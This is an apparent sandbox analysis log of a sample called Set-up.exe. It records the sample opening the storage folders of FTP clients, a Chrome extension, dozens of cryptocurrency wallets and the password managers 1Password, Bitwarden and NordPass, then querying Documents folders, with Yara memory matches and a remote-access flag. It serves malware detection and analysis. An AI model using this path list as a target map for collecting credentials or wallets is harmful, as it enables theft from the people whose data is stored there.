Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\UltraFXP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Notepad++\plugins\config\NppFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Estsoft\ALFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\FTP Now
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Notepad++\plugins\config\NppFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\FTPBox
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Estsoft\ALFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Estsoft\ALFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\FTPBox
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\FTPBox
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Notepad++\plugins\config\NppFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Local\INSoftware\NovaFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Estsoft\ALFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\FTP Now
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Notepad++\plugins\config\NppFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Local\INSoftware\NovaFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\BlazeFtp
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\GHISLER
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\BitKinex
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\GHISLER
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Program Files (x86)\GoFTP\settings
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Local\INSoftware\NovaFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\FTP Now
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Notepad++\plugins\config\NppFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\BitKinex
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\BlazeFtp
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\UltraFXP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\UltraFXP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\GHISLER
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\FTP Now
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\BlazeFtp
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\UltraFXP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\BlazeFtp
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\FTP Now
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\BitKinex
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\BitKinex
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\FTPBox
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\FTPBox
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\BitKinex
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\GHISLER
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Program Files (x86)\DeluxeFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Local\INSoftware\NovaFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\UltraFXP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\BlazeFtp
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\GHISLER
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Guarda\Local Storage\leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Guarda\Local Storage\leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Guarda\Local Storage\leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Guarda\Local Storage\leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\WalletWasabi\Client\Wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\WalletWasabi\Client\Wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\WalletWasabi\Client\Wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\WalletWasabi\Client\Wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\WalletWasabi\Client\Wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Armory
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Armory
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Armory
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Armory
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Armory
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\DashCore\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\DashCore\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\DashCore\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\DashCore\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\DashCore\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Exodus
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Exodus
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Exodus
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Exodus
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Exodus
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\BBQCoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\BBQCoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\BBQCoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\BBQCoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\BBQCoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Megacoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Megacoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Megacoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Megacoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Megacoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mincoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Mincoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Mincoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Mincoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Mincoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Namecoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Namecoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Namecoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Namecoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Namecoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Primecoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Primecoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Primecoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Primecoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Primecoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Terracoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Terracoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Terracoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Terracoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Terracoin
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Daedalus Mainnet\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Daedalus Mainnet\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Daedalus Mainnet\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Daedalus Mainnet\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Daedalus Mainnet\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Local\1Password\data
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Local\1Password\data
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\NordPass
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\Bitwarden
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\Bitwarden
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Bitwarden
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Roaming\NordPass
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Local\1Password\data
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\Bitwarden
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Bitwarden
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default User\AppData\Roaming\NordPass
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\NordPass
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Default\AppData\Roaming\NordPass
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\Public\AppData\Local\1Password\data
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\1Password\data
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\Default\Documents
Source: Yara match File source: 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7468, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7468, type: MEMORYSTR